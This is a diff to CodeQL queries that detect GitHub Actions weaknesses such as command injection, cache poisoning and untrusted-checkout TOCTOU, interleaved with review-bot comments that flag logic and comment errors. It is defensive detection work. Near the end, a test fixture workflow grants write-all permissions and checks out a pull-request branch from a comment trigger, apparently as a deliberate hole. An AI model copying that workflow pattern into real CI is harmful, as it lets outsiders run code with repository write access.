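Review bot: `JsonReferenceExpressionImpl` binds `innerExpression` and `accessPath` with two independent `_` offsets, so an expression that holds more than one `fromJson`/`toJson` call yields every inner-expression and access-path combination, including mismatched pairs. Sharing one offset, `exists(int i | innerExpression = getAJsonReferenceExpression(expression, i) and accessPath = getAJsonReferenceAccessPath(expression, i))`, keeps each path with its own call, assuming both helpers enumerate the same matches (the body of `getAJsonReferenceExpression` starts outside this hunk). The comment on `getAJsonReferenceAccessPath` was carried over unchanged: it speaks of matches of `${{...}}`, while the pattern matches `fromJson(...)`/`toJson(...)` calls and returns capture group 3, the text after the closing parenthesis, which can be empty.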
@@ -8,6 +8,12 @@ abstract class ControlCheck extends AstNode { this instanceof UsesStep } + predicate protects(Step step, Event event) { + event.getEnclosingWorkflow() = step.getEnclosingWorkflow() and + this.getAProtectedEvent() = event.getName() and + this.dominates(step) + } + predicate dominates(Step step) { this instanceof If and ( 
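Review bot: `protects(Step step, Event event)` is declared over `Step`, but callers added in this commit pass other node kinds: `inPrivilegedExternallyTriggerableJob(AstNode node)` in `Helper.qll` receives `sink.getNode().asExpr()` from the injection queries, and `CachePoisoningByCodeInjection.ql` passes `source.getNode().asExpr()`. If those nodes are expressions rather than steps, `protects` cannot hold for them, and a control check then has no effect on those queries. Widening `protects` and `dominates` to `AstNode` and comparing against the step that encloses the node would let the check apply to sinks inside a step; `dominates` begins outside this hunk, so that part needs checking against the full file. A QLDoc line such as `/** Holds if this check guards the given step when the workflow is triggered by the given event. */` would also help.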
@@ -26,22 +32,83 @@ abstract class ControlCheck extends AstNode { or this.(UsesStep).getAFollowingStep() = step } + + abstract string getAProtectedEvent(); + + abstract boolean protectsAgainstRefMutationAttacks(); } -abstract class AssociationCheck extends ControlCheck { } +abstract class AssociationCheck extends ControlCheck { + // checks who you are (identity) + // association checks are effective against pull requests since they can control who is making the PR + // they are not effective against issue_comment since the author of the comment may not be the same as the author of the PR + // someone entitled to trigger the workflow with a comment, may no detect a malicious comment, or the comment may mutate after approval + override string getAProtectedEvent() { result = ["pull_request", "pull_request_target"] } -abstract class ActorCheck extends ControlCheck { } + override boolean protectsAgainstRefMutationAttacks() { result = true } +} -abstract class RepositoryCheck extends ControlCheck { } +abstract class ActorCheck extends ControlCheck { + // checks who you are (identity) + // actor checks are effective against pull requests since they can control who is making the PR + // they are not effective against issue_comment since the author of the comment may not be the same as the author of the PR + // someone entitled to trigger the workflow with a comment, may no detect a malicious comment, or the comment may mutate after approval + override string getAProtectedEvent() { result = ["pull_request", "pull_request_target"] } -abstract class LabelCheck extends ControlCheck { } + override boolean protectsAgainstRefMutationAttacks() { result = true } +} -abstract class PermissionCheck extends ControlCheck { } +abstract class RepositoryCheck extends ControlCheck { + // repository checks are effective against pull requests since they can control where the code is coming from + // they are not effective against issue_comment since the repository will always be the same + 
// who you are (identity) + override string getAProtectedEvent() { result = ["pull_request", "pull_request_target"] } + + override boolean protectsAgainstRefMutationAttacks() { result = true } +} + +abstract class PermissionCheck extends ControlCheck { + // permission checks are effective against pull requests since they can control who can make changes + // they are not effective against issue_comment since the author of the comment may not be the same as the author of the PR + // someone entitled to trigger the workflow with a comment, may no detect a malicious comment, or the comment may mutate after approval + // who you are (identity) + override string getAProtectedEvent() { result = ["pull_request", "pull_request_target"] } + + override boolean protectsAgainstRefMutationAttacks() { result = true } +} + + +abstract class LabelCheck extends ControlCheck { + // does it protect injection attacks but not pwn requests? + // pwn requests are susceptible to checkout of mutable code + // but injection attacks are not, although a branch name can be changed after approval and perhaps also some other things + // they do actually protext against untrusted code execution (sha) + // what you have (approval) + // TODO: A check should be a combination of: + // - event type (pull_request, issue_comment, etc) + // - category (untrusted mutable code, untrusted immutable code, code injection, etc) + // - we dont know this unless we pass category to inPrivilegedContext and into ControlCheck.protects + // - we can decide if a control check is effective based only on the ast node + override string getAProtectedEvent() { result = ["pull_request", "pull_request_target"] } + + // ref can be mutated after approval + override boolean protectsAgainstRefMutationAttacks() { result = false } +} class EnvironmentCheck extends ControlCheck instanceof Environment { + // Environment checks are not effective against any mutable attacks + // they do actually protext against untrusted code 
execution (sha) + // what you have (approval) EnvironmentCheck() { any() } + + override string getAProtectedEvent() { result = ["pull_request", "pull_request_target"] } + + // ref can be mutated after approval + override boolean protectsAgainstRefMutationAttacks() { result = false } } +/* Specific implementations of control checks */ + class LabelIfCheck extends LabelCheck instanceof If { LabelIfCheck() { // eg: contains(github.event.pull_request.labels.*.name, 'safe to test') diff --git a/ql/lib/codeql/actions/security/PoisonableSteps.qll b/ql/lib/codeql/actions/security/PoisonableSteps.qll index c228965736d..dc0f3876f86 100644 --- a/ql/lib/codeql/actions/security/PoisonableSteps.qll +++ b/ql/lib/codeql/actions/security/PoisonableSteps.qll @@ -29,7 +29,8 @@ class LocalScriptExecutionRunStep extends PoisonableStep, Run { LocalScriptExecutionRunStep() { exists(string line, string regexp, int group | line = this.getScript().splitAt("\n").trim() | poisonableLocalScriptsDataModel(regexp, group) and - cmd = line.regexpCapture(".*(^|\\b|\\s+|\\$\\(|`)" + regexp + "(\\b|\\s+|;|\\)|`|$).*", group) + //cmd = line.regexpCapture(".*(^|\\b|\\s+|\\$\\(|`)" + regexp + "(\\b|\\s+|;|\\)|`|$).*", group) + cmd = line.regexpCapture(".*(^|;|\\$\\(|`|\\|)\\s*" + regexp + "\\s*(;|\\||\\)|`|$).*", group) ) } @@ -42,7 +43,7 @@ class LocalActionUsesStep extends PoisonableStep, UsesStep { class EnvVarInjectionFromFileReadRunStep extends PoisonableStep, Run { EnvVarInjectionFromFileReadRunStep() { - exists(string content, string value| + exists(string content, string value | writeToGitHubEnv(this, content) and extractVariableAndValue(content, _, value) and outputsPartialFileContent(value) diff --git a/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll b/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll index fcccc5d8a14..8187bca9f04 100644 --- a/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll +++ b/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll 
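Review bot: The same pair of overrides, `getAProtectedEvent()` returning `["pull_request", "pull_request_target"]` and `protectsAgainstRefMutationAttacks()`, is pasted into all six check classes, with the rationale kept in `//` comments that contain typos (`may no detect`, `protext`) and, in `RepositoryCheck`, a `// who you are (identity)` line stranded after unrelated text. Declaring the event list once and leaving only the boolean to override would stop the classes drifting apart. The two abstract members would benefit from QLDoc, e.g. `/** Gets the name of a trigger event for which this check is considered effective. */` and `/** Gets false if the checked-out ref can still change after this check has passed. */`. Since `protects` in the previous hunk does not consult `protectsAgainstRefMutationAttacks()`, the doc should state that callers must test the boolean themselves.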
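Review bot: The tightened pattern in `LocalScriptExecutionRunStep` only accepts a command that directly follows line start, `;`, `$(`, a backtick or `|`, and that is followed by `;`, `|`, `)`, a backtick or line end. Assuming the patterns from `poisonableLocalScriptsDataModel` (not in this hunk) match the script invocation itself, a line such as `cd dir && ./build.sh`, or a script followed by `&&`, `&` or a redirection, no longer matches, so a poisonable step after an untrusted checkout can go unreported. Adding `&` to both delimiter groups would restore the common chained form. The previous pattern left behind as a `//` comment can be removed.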
@@ -116,6 +116,22 @@ class ActionsMutableRefCheckout extends MutableRefCheckoutStep instanceof UsesSt e.getFieldName().matches("%" + ["head", "branch", "ref"] + "%") ) ) + or + exists(NeedsExpression e | + this.getArgumentExpr("ref") = e and + ( + e.getNeededJobId().matches("%" + ["head", "branch", "ref"] + "%") or + e.getFieldName().matches("%" + ["head", "branch", "ref"] + "%") + ) + ) + or + exists(JsonReferenceExpression e | + this.getArgumentExpr("ref") = e and + ( + e.getAccessPath().matches("%." + ["head", "branch", "ref"] + "%") or + e.getInnerExpression().matches("%." + ["head", "branch", "ref"] + "%") + ) + ) ) } } @@ -150,6 +166,22 @@ class ActionsSHACheckout extends SHACheckoutStep instanceof UsesStep { e.getFieldName().matches("%" + ["head", "sha", "commit"] + "%") ) ) + or + exists(NeedsExpression e | + this.getArgumentExpr("ref") = e and + ( + e.getNeededJobId().matches("%" + ["head", "sha", "commit"] + "%") or + e.getFieldName().matches("%" + ["head", "sha", "commit"] + "%") + ) + ) + or + exists(JsonReferenceExpression e | + this.getArgumentExpr("ref") = e and + ( + e.getAccessPath().matches("%." + ["head", "sha", "commit"] + "%") or + e.getInnerExpression().matches("%." + ["head", "sha", "commit"] + "%") + ) + ) ) } } diff --git a/ql/src/Security/CWE-077/EnvPathInjectionCritical.ql b/ql/src/Security/CWE-077/EnvPathInjectionCritical.ql index fc96c3d4353..4ff86eb0fbd 100644 --- a/ql/src/Security/CWE-077/EnvPathInjectionCritical.ql +++ b/ql/src/Security/CWE-077/EnvPathInjectionCritical.ql 
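Review bot: The new `NeedsExpression` and `JsonReferenceExpression` disjuncts in `ActionsMutableRefCheckout` classify the `ref` argument by substring, and `head` appears both in the mutable list here and in the SHA list of the `ActionsSHACheckout` hunk below, so a name such as `head_sha` satisfies both classes. In the `needs` case the patterns are unanchored (`"%" + [...] + "%"`), so `ref` also matches names like `prefix` or `refresh`, whereas the JSON case anchors on a leading dot. A checkout matched as mutable is what the TOCTOU queries select on, so consider excluding names that also match `sha` or `commit` from the mutable class and anchoring the `needs` patterns like the JSON ones. The existing `StepsExpression` disjunct in the context lines uses the same unanchored form and would need the same treatment.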
@@ -19,16 +19,12 @@ import EnvPathInjectionFlow::PathGraph from EnvPathInjectionFlow::PathNode source, EnvPathInjectionFlow::PathNode sink where EnvPathInjectionFlow::flowPath(source, sink) and + inPrivilegedContext(sink.getNode().asExpr()) and ( - inPrivilegedCompositeAction(sink.getNode().asExpr()) + not source.getNode().(RemoteFlowSource).getSourceType() = "artifact" or - inPrivilegedExternallyTriggerableJob(sink.getNode().asExpr()) - ) and - ( source.getNode().(RemoteFlowSource).getSourceType() = "artifact" and sink.getNode() instanceof EnvPathInjectionFromFileReadSink - or - not source.getNode().(RemoteFlowSource).getSourceType() = "artifact" ) select sink.getNode(), source, sink, "Potential PATH environment variable injection in $@, which may be controlled by an external user.", diff --git a/ql/src/Security/CWE-077/EnvPathInjectionMedium.ql b/ql/src/Security/CWE-077/EnvPathInjectionMedium.ql index cc067598c89..7ca8f4a2838 100644 --- a/ql/src/Security/CWE-077/EnvPathInjectionMedium.ql +++ b/ql/src/Security/CWE-077/EnvPathInjectionMedium.ql @@ -19,16 +19,12 @@ import EnvPathInjectionFlow::PathGraph from EnvPathInjectionFlow::PathNode source, EnvPathInjectionFlow::PathNode sink where EnvPathInjectionFlow::flowPath(source, sink) and + inNonPrivilegedContext(sink.getNode().asExpr()) and ( - inNonPrivilegedCompositeAction(sink.getNode().asExpr()) + not source.getNode().(RemoteFlowSource).getSourceType() = "artifact" or - inNonPrivilegedJob(sink.getNode().asExpr()) and - ( - not source.getNode().(RemoteFlowSource).getSourceType() = "artifact" - or - source.getNode().(RemoteFlowSource).getSourceType() = "artifact" and - sink.getNode() instanceof EnvPathInjectionFromFileReadSink - ) + source.getNode().(RemoteFlowSource).getSourceType() = "artifact" and + sink.getNode() instanceof EnvPathInjectionFromFileReadSink ) select sink.getNode(), source, sink, "Potential PATH environment variable injection in $@, which may be controlled by an external user.", 
diff --git a/ql/src/Security/CWE-077/EnvVarInjectionCritical.ql b/ql/src/Security/CWE-077/EnvVarInjectionCritical.ql index 4b0799ca441..320feb4e133 100644 --- a/ql/src/Security/CWE-077/EnvVarInjectionCritical.ql +++ b/ql/src/Security/CWE-077/EnvVarInjectionCritical.ql @@ -16,25 +16,17 @@ import actions import codeql.actions.security.EnvVarInjectionQuery import EnvVarInjectionFlow::PathGraph -predicate artifactToFileRead(DataFlow::Node source, DataFlow::Node sink) { - ( - not source.(RemoteFlowSource).getSourceType() = "artifact" - or - source.(RemoteFlowSource).getSourceType() = "artifact" and - sink instanceof EnvVarInjectionFromFileReadSink - ) -} - from EnvVarInjectionFlow::PathNode source, EnvVarInjectionFlow::PathNode sink where EnvVarInjectionFlow::flowPath(source, sink) and - ( - inPrivilegedCompositeAction(sink.getNode().asExpr()) - or - inPrivilegedExternallyTriggerableJob(sink.getNode().asExpr()) - ) and + inPrivilegedContext(sink.getNode().asExpr()) and // exclude paths to file read sinks from non-artifact sources - artifactToFileRead(source.getNode(), sink.getNode()) + ( + not source.getNode().(RemoteFlowSource).getSourceType() = "artifact" + or + source.getNode().(RemoteFlowSource).getSourceType() = "artifact" and + sink.getNode() instanceof EnvVarInjectionFromFileReadSink + ) select sink.getNode(), source, sink, "Potential environment variable injection in $@, which may be controlled by an external user.", sink, sink.getNode().toString() diff --git a/ql/src/Security/CWE-077/EnvVarInjectionMedium.ql b/ql/src/Security/CWE-077/EnvVarInjectionMedium.ql index 7eb239e83a0..bccb61ae6ea 100644 --- a/ql/src/Security/CWE-077/EnvVarInjectionMedium.ql +++ b/ql/src/Security/CWE-077/EnvVarInjectionMedium.ql 
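Review bot: The comment kept above the inlined condition, `// exclude paths to file read sinks from non-artifact sources`, says the opposite of what the condition does. Non-artifact sources are accepted with any sink, and artifact sources are accepted only when the sink is an `EnvVarInjectionFromFileReadSink`; a wording such as `// artifact sources are only reported when they reach a file-read sink` matches the code. The same comment is added in the `EnvVarInjectionMedium.ql` hunk that follows. With `artifactToFileRead` removed, the four-line condition is now repeated in the EnvPathInjection and EnvVarInjection Critical and Medium queries, so a shared library predicate would keep them in step.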
@@ -16,24 +16,16 @@ import actions import codeql.actions.security.EnvVarInjectionQuery import EnvVarInjectionFlow::PathGraph -predicate artifactToFileRead(DataFlow::Node source, DataFlow::Node sink) { - ( - not source.(RemoteFlowSource).getSourceType() = "artifact" - or - source.(RemoteFlowSource).getSourceType() = "artifact" and - sink instanceof EnvVarInjectionFromFileReadSink - ) -} - from EnvVarInjectionFlow::PathNode source, EnvVarInjectionFlow::PathNode sink where EnvVarInjectionFlow::flowPath(source, sink) and + inNonPrivilegedContext(sink.getNode().asExpr()) and + // exclude paths to file read sinks from non-artifact sources ( - inNonPrivilegedCompositeAction(sink.getNode().asExpr()) + not source.getNode().(RemoteFlowSource).getSourceType() = "artifact" or - inNonPrivilegedJob(sink.getNode().asExpr()) and - // exclude paths to file read sinks from non-artifact sources - artifactToFileRead(source.getNode(), sink.getNode()) + source.getNode().(RemoteFlowSource).getSourceType() = "artifact" and + sink.getNode() instanceof EnvVarInjectionFromFileReadSink ) select sink.getNode(), source, sink, "Potential environment variable injection in $@, which may be controlled by an external user.", diff --git a/ql/src/Security/CWE-078/CommandInjectionCritical.ql b/ql/src/Security/CWE-078/CommandInjectionCritical.ql index 2c2ab2f2af5..68942478284 100644 --- a/ql/src/Security/CWE-078/CommandInjectionCritical.ql +++ b/ql/src/Security/CWE-078/CommandInjectionCritical.ql 
@@ -19,11 +19,7 @@ import CommandInjectionFlow::PathGraph from CommandInjectionFlow::PathNode source, CommandInjectionFlow::PathNode sink where CommandInjectionFlow::flowPath(source, sink) and - ( - inPrivilegedCompositeAction(sink.getNode().asExpr()) - or - inPrivilegedExternallyTriggerableJob(sink.getNode().asExpr()) - ) + inPrivilegedContext(sink.getNode().asExpr()) select sink.getNode(), source, sink, "Potential command injection in $@, which may be controlled by an external user.", sink, sink.getNode().asExpr().(Expression).getRawExpression() diff --git a/ql/src/Security/CWE-078/CommandInjectionMedium.ql b/ql/src/Security/CWE-078/CommandInjectionMedium.ql index 072ebbc8dce..5feacedc40b 100644 --- a/ql/src/Security/CWE-078/CommandInjectionMedium.ql +++ b/ql/src/Security/CWE-078/CommandInjectionMedium.ql @@ -19,10 +19,7 @@ import CommandInjectionFlow::PathGraph from CommandInjectionFlow::PathNode source, CommandInjectionFlow::PathNode sink where CommandInjectionFlow::flowPath(source, sink) and - ( - inNonPrivilegedCompositeAction(sink.getNode().asExpr()) or - inNonPrivilegedJob(sink.getNode().asExpr()) - ) + inNonPrivilegedContext(sink.getNode().asExpr()) select sink.getNode(), source, sink, "Potential command injection in $@, which may be controlled by an external user.", sink, sink.getNode().asExpr().(Expression).getRawExpression() diff --git a/ql/src/Security/CWE-094/CodeInjectionCritical.ql b/ql/src/Security/CWE-094/CodeInjectionCritical.ql index 3b968ceaf13..f37c374658a 100644 --- a/ql/src/Security/CWE-094/CodeInjectionCritical.ql +++ b/ql/src/Security/CWE-094/CodeInjectionCritical.ql 
@@ -17,15 +17,12 @@ import actions import codeql.actions.security.CodeInjectionQuery import CodeInjectionFlow::PathGraph +import codeql.actions.security.ControlChecks from CodeInjectionFlow::PathNode source, CodeInjectionFlow::PathNode sink where CodeInjectionFlow::flowPath(source, sink) and - ( - inPrivilegedCompositeAction(sink.getNode().asExpr()) - or - inPrivilegedExternallyTriggerableJob(sink.getNode().asExpr()) - ) and + inPrivilegedContext(sink.getNode().asExpr()) and // exclude cases where the sink is a JS script and the expression uses toJson not exists(UsesStep script | script.getCallee() = "actions/github-script" and diff --git a/ql/src/Security/CWE-094/CodeInjectionMedium.ql b/ql/src/Security/CWE-094/CodeInjectionMedium.ql index abecaf997c6..43f4eb9c38a 100644 --- a/ql/src/Security/CWE-094/CodeInjectionMedium.ql +++ b/ql/src/Security/CWE-094/CodeInjectionMedium.ql @@ -17,14 +17,12 @@ import actions import codeql.actions.security.CodeInjectionQuery import CodeInjectionFlow::PathGraph +import codeql.actions.security.ControlChecks from CodeInjectionFlow::PathNode source, CodeInjectionFlow::PathNode sink where CodeInjectionFlow::flowPath(source, sink) and - ( - inNonPrivilegedCompositeAction(sink.getNode().asExpr()) or - inNonPrivilegedJob(sink.getNode().asExpr()) - ) and + inNonPrivilegedContext(sink.getNode().asExpr()) and // exclude cases where the sink is a JS script and the expression uses toJson not exists(UsesStep script | script.getCallee() = "actions/github-script" and diff --git a/ql/src/Security/CWE-349/CachePoisoning.ql b/ql/src/Security/CWE-349/CachePoisoning.ql index f202b1fcecf..607a13e142c 100644 --- a/ql/src/Security/CWE-349/CachePoisoning.ql +++ b/ql/src/Security/CWE-349/CachePoisoning.ql 
@@ -15,6 +15,7 @@ import actions import codeql.actions.security.UntrustedCheckoutQuery import codeql.actions.security.CachePoisoningQuery import codeql.actions.security.PoisonableSteps +import codeql.actions.security.ControlChecks query predicate edges(Step a, Step b) { a.getAFollowingStep() = b } @@ -23,6 +24,8 @@ where j.getATriggerEvent() = e and // job can be triggered by an external user e.isExternallyTriggerable() and + // the checkout is not controlled by an access check + not exists(ControlCheck check | check.protects(checkout, j.getATriggerEvent())) and ( // the workflow runs in the context of the default branch runsOnDefaultBranch(e) @@ -51,4 +54,4 @@ where // excluding privileged workflows since they can be exploited in easier circumstances not j.isPrivileged() ) -select s, checkout, s, "Potential cache poisoning in the context of the default branch" +select s, checkout, s, "Potential cache poisoning in the context of the default branch" diff --git a/ql/src/Security/CWE-349/CachePoisoningByCodeInjection.ql b/ql/src/Security/CWE-349/CachePoisoningByCodeInjection.ql index 030dd872cb2..e7f1385f3cd 100644 --- a/ql/src/Security/CWE-349/CachePoisoningByCodeInjection.ql +++ b/ql/src/Security/CWE-349/CachePoisoningByCodeInjection.ql 
@@ -16,12 +16,19 @@ import actions import codeql.actions.security.CodeInjectionQuery import codeql.actions.security.CachePoisoningQuery import CodeInjectionFlow::PathGraph +import codeql.actions.security.ControlChecks from CodeInjectionFlow::PathNode source, CodeInjectionFlow::PathNode sink, LocalJob j, Event e where + CodeInjectionFlow::flowPath(source, sink) and + j = sink.getNode().asExpr().getEnclosingJob() and j.getATriggerEvent() = e and // job can be triggered by an external user e.isExternallyTriggerable() and + // the checkout is not controlled by an access check + not exists(ControlCheck check | check.protects(source.getNode().asExpr(), j.getATriggerEvent())) and + // excluding privileged workflows since they can be exploited in easier circumstances + not j.isPrivileged() and ( // the workflow runs in the context of the default branch runsOnDefaultBranch(e) @@ -32,11 +39,7 @@ where caller.getCallee() = j.getLocation().getFile().getRelativePath() and runsOnDefaultBranch(caller.getATriggerEvent()) ) - ) and - // excluding privileged workflows since they can be exploited in easier circumstances - not j.isPrivileged() and - CodeInjectionFlow::flowPath(source, sink) and - j = sink.getNode().asExpr().getEnclosingJob() + ) select sink.getNode(), source, sink, "Unprivileged code injection in $@, which may lead to cache poisoning.", sink, sink.getNode().asExpr().(Expression).getRawExpression() diff --git a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql index d28cca11a56..bbbab7bcab7 100644 --- a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql +++ b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql 
@@ -22,37 +22,14 @@ from LocalJob j, MutableRefCheckoutStep checkout, PoisonableStep s, ControlCheck where j = checkout.getEnclosingJob() and j.getAStep() = checkout and - // the checkout is followed by a known poisonable step + // the checked-out code may lead to arbitrary code execution checkout.getAFollowingStep() = s and // the checkout occurs in a privileged context - ( - inPrivilegedCompositeAction(checkout) - or - inPrivilegedExternallyTriggerableJob(checkout) - ) and - // the mutable checkout step is protected by an access check + j.isPrivilegedExternallyTriggerable() and + // the mutable checkout step is protected by an Insufficient access check check.dominates(checkout) and - // the checked-out code may lead to arbitrary code execution - checkout.getAFollowingStep() instanceof PoisonableStep and - ( - // environment gates do not depend on the triggering event - check instanceof EnvironmentCheck - or - // label gates do not depend on the triggering event - check instanceof LabelCheck - or - // actor or association gates are only bypassable for IssueOps - // since an attacker can wait for a privileged user to comment on an issue - // and then mutate the checked-out code. - // however, when used for pull_request_target, the check is not bypassable since - // the actor checked is the author of the PR - ( - check instanceof AssociationCheck or - check instanceof ActorCheck or - check instanceof PermissionCheck - ) and - check.getEnclosingJob().getATriggerEvent().getName().matches("%_comment") - ) + check.protects(checkout, j.getATriggerEvent()) and + check.protectsAgainstRefMutationAttacks() = false select s, checkout, s, "Insufficient protection against execution of untrusted code on a privileged workflow on check $@.", check, check.toString() diff --git a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql index 6448f1a05a8..b9b3154debf 100644 
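Review bot: `check.dominates(checkout)` is now redundant in the `where` clause, because `ControlCheck.protects`, as added in this commit, already requires `this.dominates(step)`; the line can be dropped here and in `UntrustedCheckoutTOCTOUHigh.ql`. The long comment that explained why each kind of gate can be bypassed was deleted with the old disjunction, and the new one reads `protected by an Insufficient access check`. A replacement such as `// a check covers the trigger event but does not survive a ref change after approval` would keep the intent next to the code. `check.protects(checkout, j.getATriggerEvent())` also holds when any one trigger of the job is covered, so the alert does not say which event it applies to.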
--- a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql +++ b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql @@ -16,37 +16,18 @@ import codeql.actions.security.UntrustedCheckoutQuery import codeql.actions.security.PoisonableSteps import codeql.actions.security.ControlChecks -from MutableRefCheckoutStep checkout, ControlCheck check +from LocalJob j, MutableRefCheckoutStep checkout, ControlCheck check where - // the checkout occurs in a privileged context - ( - inPrivilegedCompositeAction(checkout) - or - inPrivilegedExternallyTriggerableJob(checkout) - ) and + j = checkout.getEnclosingJob() and + j.getAStep() = checkout and // there are no evidences that the checked-out gets executed not checkout.getAFollowingStep() instanceof PoisonableStep and - // the mutable checkout step is protected by an access check + // the checkout occurs in a privileged context + j.isPrivilegedExternallyTriggerable() and + // the mutable checkout step is protected by an Insufficient access check check.dominates(checkout) and - ( - // environment gates do not depend on the triggering event - check instanceof EnvironmentCheck - or - // label gates do not depend on the triggering event - check instanceof LabelCheck - or - // actor or association gates are only bypassable for IssueOps - // since an attacker can wait for a privileged user to comment on an issue - // and then mutate the checked-out code. - // however, when used for pull_request_target, the check is not bypassable since - // the actor checked is the author of the PR - ( - check instanceof AssociationCheck or - check instanceof ActorCheck or - check instanceof PermissionCheck - ) and - check.getEnclosingJob().getATriggerEvent().getName().matches("%_comment") - ) + check.protects(checkout, j.getATriggerEvent()) and + check.protectsAgainstRefMutationAttacks() = false select checkout, "Insufficient protection against execution of untrusted code on a privileged workflow on step $@.", check, check.toString() 
diff --git a/ql/src/Security/CWE-829/ArtifactPoisoningCritical.ql b/ql/src/Security/CWE-829/ArtifactPoisoningCritical.ql index a7d2518564d..82c6f936c51 100644 --- a/ql/src/Security/CWE-829/ArtifactPoisoningCritical.ql +++ b/ql/src/Security/CWE-829/ArtifactPoisoningCritical.ql @@ -14,15 +14,12 @@ import actions import codeql.actions.security.ArtifactPoisoningQuery import ArtifactPoisoningFlow::PathGraph +import codeql.actions.security.ControlChecks from ArtifactPoisoningFlow::PathNode source, ArtifactPoisoningFlow::PathNode sink where ArtifactPoisoningFlow::flowPath(source, sink) and - ( - inPrivilegedCompositeAction(sink.getNode().asExpr()) - or - inPrivilegedExternallyTriggerableJob(sink.getNode().asExpr()) - ) + inPrivilegedContext(sink.getNode().asExpr()) select sink.getNode(), source, sink, "Potential artifact poisoning in $@, which may be controlled by an external user.", sink, sink.getNode().toString() diff --git a/ql/src/Security/CWE-829/ArtifactPoisoningMedium.ql b/ql/src/Security/CWE-829/ArtifactPoisoningMedium.ql index a4fb958b7f9..992b2aa8c5d 100644 --- a/ql/src/Security/CWE-829/ArtifactPoisoningMedium.ql +++ b/ql/src/Security/CWE-829/ArtifactPoisoningMedium.ql @@ -14,14 +14,12 @@ import actions import codeql.actions.security.ArtifactPoisoningQuery import ArtifactPoisoningFlow::PathGraph +import codeql.actions.security.ControlChecks from ArtifactPoisoningFlow::PathNode source, ArtifactPoisoningFlow::PathNode sink where ArtifactPoisoningFlow::flowPath(source, sink) and - ( - inNonPrivilegedCompositeAction(sink.getNode().asExpr()) or - inNonPrivilegedJob(sink.getNode().asExpr()) - ) + inNonPrivilegedContext(sink.getNode().asExpr()) select sink.getNode(), source, sink, "Potential artifact poisoning in $@, which may be controlled by an external user.", sink, sink.getNode().toString() diff --git a/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql b/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql index c1d72dd4664..a0da81bde22 100644 
--- a/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql +++ b/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql @@ -27,11 +27,5 @@ where // the checkout is followed by a known poisonable step checkout.getAFollowingStep() = s and // the checkout occurs in a privileged context - ( - inPrivilegedCompositeAction(checkout) - or - inPrivilegedExternallyTriggerableJob(checkout) - ) and - // the checkout is not controlled by an access check - not exists(ControlCheck check | check.dominates(checkout)) + inPrivilegedContext(checkout) select s, checkout, s, "Execution of untrusted code on a privileged workflow." diff --git a/ql/src/Security/CWE-829/UntrustedCheckoutHigh.ql b/ql/src/Security/CWE-829/UntrustedCheckoutHigh.ql index 468a1214c62..dba0dadb61b 100644 --- a/ql/src/Security/CWE-829/UntrustedCheckoutHigh.ql +++ b/ql/src/Security/CWE-829/UntrustedCheckoutHigh.ql @@ -25,11 +25,5 @@ where // the checkout is NOT followed by a known poisonable step not checkout.getAFollowingStep() instanceof PoisonableStep and // the checkout occurs in a privileged context - ( - inPrivilegedCompositeAction(checkout) - or - inPrivilegedExternallyTriggerableJob(checkout) - ) and - // the checkout is not controlled by an access check - not exists(ControlCheck check | check.dominates(checkout)) + inPrivilegedContext(checkout) select checkout, "Potential execution of untrusted code on a privileged workflow." diff --git a/ql/src/Security/CWE-829/UntrustedCheckoutMedium.ql b/ql/src/Security/CWE-829/UntrustedCheckoutMedium.ql index 3edde8dcf54..ca91fcb9048 100644 --- a/ql/src/Security/CWE-829/UntrustedCheckoutMedium.ql +++ b/ql/src/Security/CWE-829/UntrustedCheckoutMedium.ql 
@@ -22,11 +22,6 @@ from LocalJob j, PRHeadCheckoutStep checkout where j = checkout.getEnclosingJob() and j.getAStep() = checkout and - // the checkout is not controlled by an access check - not exists(ControlCheck check | check.dominates(checkout)) and // the checkout occurs in a non-privileged context - ( - inNonPrivilegedCompositeAction(checkout) or - inNonPrivilegedJob(checkout) - ) + inNonPrivilegedContext(checkout) select checkout, "Potential unsafe checkout of untrusted pull request on privileged workflow." diff --git a/ql/test/query-tests/Security/CWE-367/.github/workflows/comment.yml b/ql/test/query-tests/Security/CWE-367/.github/workflows/comment.yml index 498b46090cb..a4acd738766 100644 --- a/ql/test/query-tests/Security/CWE-367/.github/workflows/comment.yml +++ b/ql/test/query-tests/Security/CWE-367/.github/workflows/comment.yml @@ -5,13 +5,11 @@ on: types: [created] permissions: 'write-all' jobs: - benchmark: - name: Integration Tests + test1: if: ${{ github.event.issue.pull_request && contains(fromJson('["MEMBER", "OWNER"]'), github.event.comment.author_association) && startsWith(github.event.comment.body, '/run-tests ') }} - runs-on: [ubuntu-latest] + runs-on: ubuntu-latest steps: - # test1 - uses: actions/github-script@v6 name: Get PR branch id: issue 
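Review bot: The alert text on the `select` line says `on privileged workflow`, while the condition directly above it is `inNonPrivilegedContext(checkout)` and its comment says `non-privileged context`, so every Medium result is described with the wrong privilege level. Since this commit already rewrites the condition, the message should be corrected in the same change, for example `select checkout, "Potential unsafe checkout of untrusted pull request on non-privileged workflow."`. The `.expected` file for this query would then need regenerating with the new text.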
